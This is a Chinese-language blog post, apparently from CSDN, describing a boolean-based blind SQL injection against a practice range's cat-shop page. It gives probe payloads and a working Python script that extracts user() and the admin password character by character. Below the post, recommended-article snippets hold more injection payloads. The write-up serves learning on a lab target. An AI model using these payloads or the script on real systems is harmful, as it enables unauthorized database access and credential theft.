记一次用Python挑战SQL注入

最新推荐文章于 2024-04-10 09:22:59 发布
最新推荐文章于 2024-04-10 09:22:59 发布
阅读量912 收藏 3
点赞数 29
文章标签: SQL注入 mysql 渗透测试 Python 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44371842/article/details/105493052
版权

前言

  • 最近哥们给我分享了一个靶场地址,疫情在家闲着无聊便拿来挑战一下。
  • 靶场地址

分析

  • 可以看到,题目要求是拿到管理员密码即可。
    在这里插入图片描述

  • 再进入靶机页面瞅瞅,看来就是要在url上操作了
    在这里插入图片描述

  • 简单加一个and 1=1和and 1=2,发现1=1时,显示下面的猫舍介绍,1=2时,不显示猫舍介绍。这个变化就作为分辨依据。
    在这里插入图片描述

开始挑战

先拿一手user()(此时我已经忘记题目要求要拿管理员密码。。。。。)

先拿user()长度
  • 先and char_length(user())>0,OK
  • 再and char_length(user()>100),ERROR
  • 。。。。。。(中间省略,自己慢慢试)
  • 就这样把user()的长度试了出来,16。
长度出来,试字段
  • 用and ASCII(mid(user(),1,1))>0,试出来后查表转换为字符
  • 然后我们用python(不要问我为啥突然用python,试了8个字符后,手都试酸了。。。T0T)
  • 上代码(代码不能直接用啊,自己简单分析一下,根据自己要获取的内容改一下,再补全IP就能用了)
import re,requests

result = []
string = []
for j in range(1,17):	#循环第几个字符
    for i in range(97,123):	#从ASCII码表的第几到几开始试,试全部可能会慢很多
        #url = 'http://117.167.*.*:10180/index.php?id=1%20and%20(select%20ascii(mid(password,'+str(j)+',1))%20from%20admin)='+str(i) #找password时候用的
        #url = 'http://117.167.*.*:10180/index.php?id=1'+'and ASCII(mid(1,1))='+str(i)
        url = 'http://117.167.*.*:10180/index.php?id=1%20and%20ASCII(mid(user(),'+str(j)+',1))='+str(i)
        res = requests.get(url)
        res.encoding = 'utf8'
        if("猫舍介绍" in res.text):#判断返回的是OK还是ERROR
            print(str(j)+'是'+str(i))
            result.append(str(j)+':'+str(i))
            string.append(str(j)+':'+chr(i)) #将得到的编码自动转换成字符
            break
        else:
            print('不是'+str(i))

print(result)
print(string)
  • 程序运行完之后记得查看输出结果是否有没试出来的字符,可以换个区间重新试一下或者自己手动试。

同理再拿一手database()

  • maoshe

再拿一手version()

  • 5.5.53

再拿一手hostname

  • gongksik_d45fb6

再拿一手。。。。。。

哎,我到底要拿啥来着,哦对,管理员密码

先找表
  • 先随便试一下有没有admin表,and (select count(*) from admin)>0,Woc!!!还真有!
  • 再随便试一下有没有password字段,and(select count(password) from admin)>0,Woc!!!又有!
  • 这里博主走了点狗屎运,读者请勿模仿,自行一个个猜哈~
  • 接下来就简单了,用上上面的python代码
  • 注入标记改为(select ASSII(mid(password,1,1)))>0
  • 然后就得到了管理员密码——(自己试去,┑( ̄▽  ̄)┍)

接下来最重要的步骤——登录MySQL系统

  • 等好久都不成功,才想起我们的目标只是拿到管理员密码。。。。。
    在这里插入图片描述

后记

  • 本次SQL注入到此结束,还愣着干啥,点赞关注走一走啊。。。。( ̄︶ ̄)↗
数据艺术家.
关注
WEB入门——SQL注入(一)
HasntStartIsOver的博客
06-03 1320
简单的SQL注入
dataframe_sql:Python程序包,用于解析SQL并将其解释为对已声明和注册的现有熊猫(或其他类型)DataFrame起作用的方法
01-28
`dataframe_sql` 还支持使用参数化查询,这对于避免SQL注入和提高代码可读性非常有用。此外,如果你的工作流程中涉及到多个DataFrame,你可以注册它们并进行复杂的联合查询。 虽然`dataframe_sql` 并不支持SQL的每...
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 543
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔。0x01笔sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
pythonsql注入
love_parents的博客
09-10 3295
转载自: python SQL注入的解决办法 pythonsql注入 背景 APP爆出一个大Bug,只要在查询框内输入“%”,就会检索出所有的数据,最后有人给出了这样的解决方案,在前端进行验证,禁止用户输入“%”之类的特殊字符。 帅呆了!责任轻易地就甩给了前端! 我反问,如果百分号要进行禁止,那么“*&’“()”要不要进行禁止?“desc、select、from”等关键字要不要禁止?还有“+-”,正则表达式相关的符号要不要禁止?就算输入框禁止了,直接发送http请求又如何禁止?
sql注入python_Python--sql注入
weixin_39702799的博客
12-15 147
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
python番外篇--sql注入
aqovxg590751的博客
04-27 138
一、sql注入概念介绍 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 二、Python中防止...
Python实现的SQL注入自动化工具——SQLReveal
接着,作者分析了国内网络安全从业者在应对这一问题时面临的挑战,并强调了研究SQL注入检测和利用技术的理论与实践价值。 在理论基础上,论文详细介绍了SQL注入的产生原理,包括常见的注入技巧,以及自动化注入工具...
青少年CTF挑战SQL注入解题攻略与sqlmap使用
"青少年CTF平台的sql-labs 1-10关的解题方法,包含多种解决方案,包括使用sqlmap和Python脚本,适用于学习sql注入和web安全。" 在sql-labs的前五关中,我们主要涉及到的是SQL注入(SQL Injection)的基本技巧和策略...
Python操作Mysql防注入与数组式SQL编写指南
资源摘要信息: "本资源是一套用于连接PythonMySQL数据库的库文件,核心优势在于提供了防止SQL注入的功能,同时支持使用数组变量来构建SQL语句,这在很大程度上简化了编写安全可靠的数据库操作代码的过程。...
pythonsql注入步骤_Pythonsql注入
weixin_39639260的博客
11-30 197
请问当以下代码在cmd运行的时候如何使用sql注入使得他可以接受任何账号密码#Runvia`pythoninjection.py`--compatiblewithPython2andPython3from__future__importprint_function#Ifraw...请问当以下代码在cmd运行的时候如何使用sql注入使得他可以接受任何账号密码# Run via `python inj...
Python--sql注入
weixin_34236497的博客
02-02 113
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
python sql 注入实例
weixin_45131345的博客
04-22 482
# from pymysql import * # conn = connect(host="127.0.0.1", port=3306, database="haha", user="root", password="123456", charset="utf8") # cur = conn.cursor() # key = " '' or '1'='1'" # cur.execute("se...
python实现sql注入脚本
czx1234566的博客
11-30 1768
根据dblen这个变量的不断变化,然后用这不断变化返回值写了一个if判断去判断是否有这个返回值里是否有“You are in...........”字符串。之后的爆表名,列名,字段等,都类似,该下payload就行了,还有这个i的值是可以变的,如果不知道表名的长度,就给i的值的范围给大一点。这个原理同刚刚所说,只是换了个payload,i是用来代表数据库的长度。输入id=1,这个返回的是正确的页面咯,那来看看错误的。然后我们就以这个为特征,围绕着这个去写个脚本。个人认为就是找特征,围绕着这个特征去写脚本。
python注入攻击_pythonsql注入
weixin_32818919的博客
02-21 633
coding:utf-8from pymysql importconnect#连接数据库conn=connect(host=‘localhost‘,port= 3306,user=‘root‘,passwd=‘root‘,db=‘ca‘,)#创建操作游标,创建了mysql的操作链接a=conn.cursor()#设置字符集为Utf-8a.execute(‘set names utf8‘)方法一fo...
Python自动化sql注入:布尔盲注_布尔盲注脚本,一次关于网络安全的面试经历
最新发布
2401_84182636的博客
04-10 1090
id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘表名’ limit 1,1),1,1))=102–+是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!id=1’ and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1–+
python sql注入原理_SQL注入原理(转载)
weixin_39942351的博客
12-09 259
一、什么是sql注入呢?所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未...
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1559
本例中以靶机DVWA中的盲注为例。
评论 20
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值